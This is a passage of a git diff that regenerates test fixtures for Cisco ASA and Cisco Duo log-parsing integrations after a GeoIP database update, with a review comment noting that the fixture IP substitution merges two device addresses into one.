 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:16.395330200Z",
+ "ingested": "2021-12-14T14:39:02.289552442Z",
 "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302013: Built outbound TCP connection 447237 for outside:192.168.2.222/1234 (192.168.2.222/1234) to dmz:192.168.1.34/65000 (192.168.1.34/65000)",
 "code": "302013",
 "kind": "event",
@@ -3756,7 +3756,7 @@
 "severity": 6,
 "duration": 86399000000000,
 "reason": "TCP FINs",
- "ingested": "2021-12-09T13:34:16.395335600Z",
+ "ingested": "2021-12-14T14:39:02.289552834Z",
 "original": "Dec 11 2018 08:01:53 \u003cIP\u003e: %ASA-6-302014: Teardown TCP connection 447237 for outside:192.168.2.222/1234 to dmz:10.10.10.10/1235 duration 23:59:59 bytes 11420 TCP FINs",
 "code": "302014",
 "kind": "event",
@@ -3829,7 +3829,7 @@
 "event": {
 "severity": 6,
 "duration": 122000000000,
- "ingested": "2021-12-09T13:34:16.395341Z",
+ "ingested": "2021-12-14T14:39:02.289553220Z",
 "original": "Aug 15 2012 23:30:09 : %ASA-6-302016 Teardown UDP connection 40 for outside:10.44.4.4/500 to inside:10.44.2.2/500 duration 0:02:02 bytes 1416",
 "code": "302016",
 "kind": "event",
@@ -3896,7 +3896,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395346200Z",
+ "ingested": "2021-12-14T14:39:02.289553607Z",
 "original": "Sep 12 2014 06:50:53 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -3960,7 +3960,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395351500Z",
+ "ingested": "2021-12-14T14:39:02.289553994Z",
 "original": "Sep 12 2014 06:51:01 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4024,7 +4024,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395356800Z",
+ "ingested": "2021-12-14T14:39:02.289554379Z",
 "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4088,7 +4088,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395361500Z",
+ "ingested": "2021-12-14T14:39:02.289554759Z",
 "original": "Sep 12 2014 06:51:05 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.47 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4152,7 +4152,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395366900Z",
+ "ingested": "2021-12-14T14:39:02.289555141Z",
 "original": "Sep 12 2014 06:51:06 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4216,7 +4216,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395372200Z",
+ "ingested": "2021-12-14T14:39:02.289555524Z",
 "original": "Sep 12 2014 06:51:17 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.99.57 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4280,7 +4280,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395377500Z",
+ "ingested": "2021-12-14T14:39:02.289555905Z",
 "original": "Sep 12 2014 06:52:48 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4344,7 +4344,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:34:16.395382700Z",
+ "ingested": "2021-12-14T14:39:02.289556291Z",
 "original": "Sep 12 2014 06:53:00 GIFRCHN01 : %ASA-2-106016: Deny IP spoof from (0.0.0.0) to 192.168.1.255 on interface Mobile_Traffic",
 "code": "106016",
 "kind": "event",
@@ -4419,7 +4419,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:16.395387Z",
+ "ingested": "2021-12-14T14:39:02.289556698Z",
 "original": "Sep 12 2014 06:53:01 GIFRCHN01 : %ASA-4-106023: Deny tcp src outside:192.168.2.95/24069 dst inside:10.32.112.125/25 by access-group \"PERMIT_IN\" [0x0, 0x0]\"",
 "code": "106023",
 "kind": "event",
@@ -4484,7 +4484,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:34:16.395390600Z",
+ "ingested": "2021-12-14T14:39:02.289557100Z",
 "original": "Sep 12 2014 06:53:02 GIFRCHN01 : %ASA-3-313001: Denied ICMP type=3, code=3 from 10.2.3.5 on interface Outside",
 "code": "313001",
 "kind": "event",
@@ -4547,7 +4547,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:16.395394500Z",
+ "ingested": "2021-12-14T14:39:02.289557477Z",
 "original": "Jan 14 2015 13:16:13: %ASA-4-313004: Denied ICMP type=0, from laddr 172.16.30.2 on interface inside to 172.16.1.10: no matching session",
 "code": "313004",
 "kind": "event",
@@ -4628,7 +4628,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:16.395398600Z",
+ "ingested": "2021-12-14T14:39:02.289557870Z",
 "original": "Jan 14 2015 13:16:14: %ASA-4-338002: Dynamic Filter permitted black listed TCP traffic from inside:10.1.1.45/6798 (192.168.99.1/7890) to outside:192.168.99.129/80 (192.168.99.129/80), destination 192.168.99.129 resolved from dynamic list: bad.example.com",
 "code": "338002",
 "kind": "event",
@@ -4706,7 +4706,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:16.395403900Z",
+ "ingested": "2021-12-14T14:39:02.289558261Z",
 "original": "Jan 14 2015 13:16:14: %ASA-4-338004: Dynamic Filter monitored blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware",
 "code": "338004",
 "kind": "event",
@@ -4785,7 +4785,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:34:16.395409300Z",
+ "ingested": "2021-12-14T14:39:02.289558702Z",
 "original": "Jan 14 2015 13:16:14: %ASA-4-338008: Dynamic Filter dropped blacklisted TCP traffic from inside:10.1.1.1/33340 (10.2.1.1/33340) to outsidet:192.168.2.223/80 (192.168.2.223/80), destination 192.168.2.223 resolved from dynamic list: 192.168.2.223/255.255.255.255, threat-level: very-high, category: Malware",
 "code": "338008",
 "kind": "event",
@@ -4849,7 +4849,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-09T13:34:16.395414600Z",
+ "ingested": "2021-12-14T14:39:02.289559092Z",
 "original": "Nov 16 2009 14:12:35: %ASA-5-304001: 10.30.30.30 Accessed URL 192.168.2.1:/app",
 "code": "304001",
 "kind": "event",
@@ -4905,7 +4905,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-09T13:34:16.395419700Z",
+ "ingested": "2021-12-14T14:39:02.289559488Z",
 "original": "Nov 16 2009 14:12:36: %ASA-5-304001: 10.5.111.32 Accessed URL 192.168.2.32:http://example.com",
 "code": "304001",
 "kind": "event",
@@ -4967,7 +4967,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-12-09T13:34:16.395424200Z",
+ "ingested": "2021-12-14T14:39:02.289559879Z",
 "original": "Nov 16 2009 14:12:37: %ASA-5-304002: Access denied URL http://www.example.net/images/favicon.ico SRC 10.69.6.39 DEST 192.168.0.19 on interface inside",
 "code": "304002",
 "kind": "event",
@@ -4994,20 +4994,14 @@
 "destination": {
 "geo": {
 "continent_name": "Europe",
- "region_iso_code": "GB-OXF",
- "city_name": "Abingdon",
+ "region_iso_code": "GB-ENG",
+ "city_name": "London",
 "country_iso_code": "GB",
 "country_name": "United Kingdom",
- "region_name": "Oxfordshire",
+ "region_name": "England",
 "location": {
- "lon": -1.3614,
- "lat": 51.7095
- }
- },
- "as": {
- "number": 20712,
- "organization": {
- "name": "Andrews \u0026 Arnold Ltd"
+ "lon": -0.0931,
+ "lat": 51.5142
 }
 },
 "address": "81.2.69.144",
@@ -5063,7 +5057,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:16.395429600Z",
+ "ingested": "2021-12-14T14:39:02.289560272Z",
 "original": "Jan 13 2021 19:12:37: %ASA-6-302013: Built inbound TCP connection 27215708 for internet:10.2.3.4/49926 (81.2.69.144/49926)(LOCAL\\username) to vlan-42:81.2.69.144/80 (81.2.69.144/80) (username)",
 "code": "302013",
 "kind": "event",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json
index 68ceea4834c..89fafd430bd 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sip.log-expected.json
@@ -47,7 +47,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:24.465484300Z",
+ "ingested": "2021-12-14T14:39:10.763679209Z",
 "original": "Oct 20 2019 15:42:54: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf53204:10.13.170.13/5060 to ACI-App_VRF:172.16.90.3 from OPTIONS message",
 "code": "607001",
 "kind": "event",
@@ -115,7 +115,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:24.465492800Z",
+ "ingested": "2021-12-14T14:39:10.763682383Z",
 "original": "Jun 08 2020 12:59:57: %ASA-6-607001: Pre-allocate SIP SIGNALLING UDP secondary channel for vrf53204:10.18.133.23/5060 to ACI-App_VRF:172.16.74.3 from OPTIONS message",
 "code": "607001",
 "kind": "event",
@@ -183,7 +183,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:24.465498400Z",
+ "ingested": "2021-12-14T14:39:10.763682882Z",
 "original": "Aug 6 2020 11:01:37: %ASA-6-607001: Pre-allocate SIP NOTIFY UDP secondary channel for vrf52304:10.18.170.54/5060 to ACI-App_VRF:172.16.72.5 from 200 message",
 "code": "607001",
 "kind": "event",
@@ -214,6 +214,18 @@
 "ip": "10.13.133.64"
 },
 "source": {
+ "geo": {
+ "continent_name": "Asia",
+ "country_name": "Bhutan",
+ "location": {
+ "lon": 90.5,
+ "lat": 27.5
+ },
+ "country_iso_code": "BT"
+ },
+ "as": {
+ "number": 35908
+ },
 "address": "67.43.156.12",
 "ip": "67.43.156.12"
 },
@@ -251,7 +263,7 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-12-09T13:34:24.465503900Z",
+ "ingested": "2021-12-14T14:39:10.763683296Z",
 "original": "Aug 6 2020 11:01:38: %ASA-6-607001: Pre-allocate SIP Via UDP secondary channel for vrf52304:10.13.133.64/5060 to ACI-App_VRF:67.43.156.12 from REGISTER message",
 "code": "607001",
 "kind": "event",
diff --git a/packages/cisco_asa/manifest.yml b/packages/cisco_asa/manifest.yml
index efaab5d515e..e0494dcfebf 100644
--- a/packages/cisco_asa/manifest.yml
+++ b/packages/cisco_asa/manifest.yml
@@ -1,7 +1,7 @@
 format_version: 1.0.0
 name: cisco_asa
 title: Cisco ASA
-version: 1.3.1
+version: 1.3.2
 license: basic
 description: Collect logs from Cisco ASA with Elastic Agent.
 type: integration
diff --git a/packages/cisco_duo/_dev/deploy/docker/files/config.yml b/packages/cisco_duo/_dev/deploy/docker/files/config.yml
index 4970c1c9917..b072ddc223f 100644
--- a/packages/cisco_duo/_dev/deploy/docker/files/config.yml
+++ b/packages/cisco_duo/_dev/deploy/docker/files/config.yml
@@ -10,7 +10,7 @@ rules: responses: - status_code: 200 body: | - {"response":{"authlogs":[{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}},{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 
12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}}]},"stat":"OK"} + {"response":{"authlogs":[{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}},{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United 
States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}}]},"stat":"OK"} - path: /admin/v1/logs/offline_enrollment methods: ["GET"] responses: diff --git a/packages/cisco_duo/changelog.yml b/packages/cisco_duo/changelog.yml index 889158c7504..9b4774cf8ec 100644 --- a/packages/cisco_duo/changelog.yml +++ b/packages/cisco_duo/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.2.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json index 665555b1e29..eeccba904db 100644 --- a/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json +++ b/packages/cisco_duo/data_stream/admin/_dev/test/pipeline/test-admin.log-expected.json @@ -7,7 +7,7 @@ }, "event": { "action": "activation_begin", - "ingested": "2021-09-22T06:45:47.125628487Z", + "ingested": "2021-12-14T14:39:14.049568294Z", "original": "{\"action\":\"activation_begin\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}", "kind": "event", "outcome": "success" 
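Review bot: Replacing every address in the mocked Duo response with 89.160.20.156 maps access_device.ip and auth_device.ip — two distinct public addresses before, 169.232.89.219 and 169.232.89.112 — onto the same value, so the fixture no longer exercises a distinct auth_device address. The same substitution is made in the test-auth.log hunk, and its expected output shows the effect: related.ip shrinks from two entries to one for the events whose auth_device.ip used to differ. Moving off a real university-owned address onto the GeoIP test range is the right call; giving auth_device.ip a second test-range address, e.g. `"auth_device":{"ip":"67.43.156.12",…}` (67.43.156.12 is already resolved by the new database in the cisco_asa SIP fixture above), keeps that coverage. The changelog entry describes the change only as regenerating test files; a mention that fixture IPs were replaced would help anyone diffing the expected outputs.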
@@ -33,7 +33,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-22T06:45:47.125635478Z",
+ "ingested": "2021-12-14T14:39:14.049571581Z",
 "original": "{\"action\":\"admin_activate_duo_push\",\"description\":\"{\\\"number\\\": \\\"+12345678901\\\", \\\"extension\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"940-967-2177\",\"timestamp\":1626781477,\"username\":\"\"}",
 "kind": "event",
 "action": "admin_activate_duo_push",
@@ -69,7 +69,7 @@
 "event": {
 "reason": "Starting activation process",
 "action": "activation_begin",
- "ingested": "2021-09-22T06:45:47.125638401Z",
+ "ingested": "2021-12-14T14:39:14.049572080Z",
 "original": "{\"action\":\"activation_begin\",\"description\":\"Starting activation process\",\"isotimestamp\":\"2021-07-20T11: 41: 31+00: 00\",\"object\":null,\"timestamp\":1626781291,\"username\":\"narroway\"}",
 "kind": "event",
 "outcome": "success"
@@ -97,7 +97,7 @@
 },
 "event": {
 "action": "activation_set_password",
- "ingested": "2021-09-22T06:45:47.125641122Z",
+ "ingested": "2021-12-14T14:39:14.049572473Z",
 "original": "{\"action\":\"activation_set_password\",\"description\":null,\"isotimestamp\":\"2021-07-20T11: 44: 09+00: 00\",\"object\":\"narroway\",\"timestamp\":1626781449,\"username\":\"narroway\"}",
 "kind": "event",
 "outcome": "success"
@@ -127,14 +127,14 @@
 "version": "1.11.0"
 },
 "event": {
+ "ingested": "2021-12-14T14:39:14.049572865Z",
+ "original": "{\"action\":\"admin_self_activate\",\"description\":\"{\\\"name\\\": \\\"narroway\\\", \\\"phone\\\": \\\"+12345678901\\\", \\\"is_temporary_password\\\": false, \\\"email\\\": \\\"narroway@example.com\\\", \\\"hardtoken\\\": null, \\\"role\\\": \\\"Owner\\\", \\\"status\\\": \\\"Pending Activation\\\", \\\"restricted_by_admin_units\\\": false, \\\"administrative_units\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"jsmith\",\"timestamp\":1626781477,\"username\":\"narroway\"}",
+ "kind": "event",
 "action": "admin_self_activate",
 "category": "iam",
- "ingested": "2021-09-22T06:45:47.125643826Z",
- "original": "{\"action\":\"admin_self_activate\",\"description\":\"{\\\"name\\\": \\\"narroway\\\", \\\"phone\\\": \\\"+12345678901\\\", \\\"is_temporary_password\\\": false, \\\"email\\\": \\\"narroway@example.com\\\", \\\"hardtoken\\\": null, \\\"role\\\": \\\"Owner\\\", \\\"status\\\": \\\"Pending Activation\\\", \\\"restricted_by_admin_units\\\": false, \\\"administrative_units\\\": \\\"\\\"}\",\"isotimestamp\":\"2021-07-20T11:44:37+00:00\",\"object\":\"jsmith\",\"timestamp\":1626781477,\"username\":\"narroway\"}",
 "type": [
 "admin"
 ],
- "kind": "event",
 "outcome": "success"
 },
 "user": {
@@ -172,7 +172,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-22T06:45:47.125646491Z",
+ "ingested": "2021-12-14T14:39:14.049573356Z",
 "original": "{\"action\":\"admin_update\",\"description\":\"{\\\"phone\\\": \\\"+451234567890\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}",
 "kind": "event",
 "action": "admin_update",
@@ -211,7 +211,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-22T06:45:47.125649181Z",
+ "ingested": "2021-12-14T14:39:14.049573744Z",
 "original": "{\"action\":\"user_update\",\"description\":\"{\\\"realname\\\": \\\"test 4\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}",
 "kind": "event",
 "action": "user_update",
@@ -254,7 +254,7 @@
 "version": "1.11.0"
 },
 "event": {
- "ingested": "2021-09-22T06:45:47.125651772Z",
+ "ingested": "2021-12-14T14:39:14.049574133Z",
 "original": "{\"action\":\"user_update\",\"description\":\"{\\\"email\\\": \\\"narroway@example.com\\\", \\\"Sync Ref. Code\\\": \\\"41c7e5714a91d17dea11157539d5d1ac\\\"}\",\"isotimestamp\":\"2021-07-20T11:45:11+00:00\",\"object\":\"narroway\",\"timestamp\":1626781511,\"username\":\"narroway\"}",
 "kind": "event",
 "action": "user_update",
diff --git a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log
index c58e3492ecb..0e446a74184 100644
--- a/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log
+++ b/packages/cisco_duo/data_stream/auth/_dev/test/pipeline/test-auth.log
@@ -1,5 +1,5 @@ -{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}} -{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD 
Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} -{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.131","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-08-12T09:14:23.060168+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1628759663,"txid":"861a81e7-1f60-4865-95eb-57d9c43ce073","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} -{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:20:54.700050+00:00","ood_software":null,"reason":"user_marked_fraud","result":"fraud","timestamp":1627024854,"txid":"78e1a910-350b-4226-828b-edb0ac2f2e3c","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} 
-{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"169.232.89.219","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"169.232.89.112","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:19:34.702203+00:00","ood_software":null,"reason":"user_mistake","result":"denied","timestamp":1627024774,"txid":"e22120cd-7388-424f-aa0a-b60cad42d8f3","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} \ No newline at end of file +{"access_device":{"browser":"Chrome","browser_version":"67.0.3396.99","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":true,"is_firewall_enabled":true,"is_password_set":true,"java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Mac OS X","os_version":"10.14.1","security_agents":[]},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Microsoft Azure Active Directory"},"auth_device":{"ip":"192.168.225.254","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"My iPhone X (734-555-2342)"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2020-02-13T18:56:20.351346+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1581620180,"trusted_endpoint_status":"not trusted","txid":"340a23e3-23f3-23c1-87dc-1491a23dfdbb","user":{"groups":["Duo Users","CorpHQ Users"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway@example.com"}} 
+{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.107","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 12345"},"email":"narroway@example.com","event_type":"authentication","factor":"duo_push","isotimestamp":"2021-07-23T07:21:51.271776+00:00","ood_software":null,"reason":"user_approved","result":"success","timestamp":1627024911,"txid":"fa59a691-9139-43e9-9854-f9e1dbf72af5","user":{"groups":["AD Sync"],"key":"DU3KC77WJ06Y5HIV7XKQ","name":"narroway"}} +{"access_device":{"browser":"Chrome","browser_version":"92.0.4515.131","flash_version":"uninstalled","hostname":null,"ip":"89.160.20.156","is_encryption_enabled":"unknown","is_firewall_enabled":"unknown","is_password_set":"unknown","java_version":"uninstalled","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"os":"Windows","os_version":"10"},"alias":"","application":{"key":"DIY231J8BR23QK4UKBY8","name":"Duo Access Gateway Launcher"},"auth_device":{"ip":"89.160.20.156","location":{"city":"Ann Arbor","country":"United States","state":"Michigan"},"name":"+91 12345 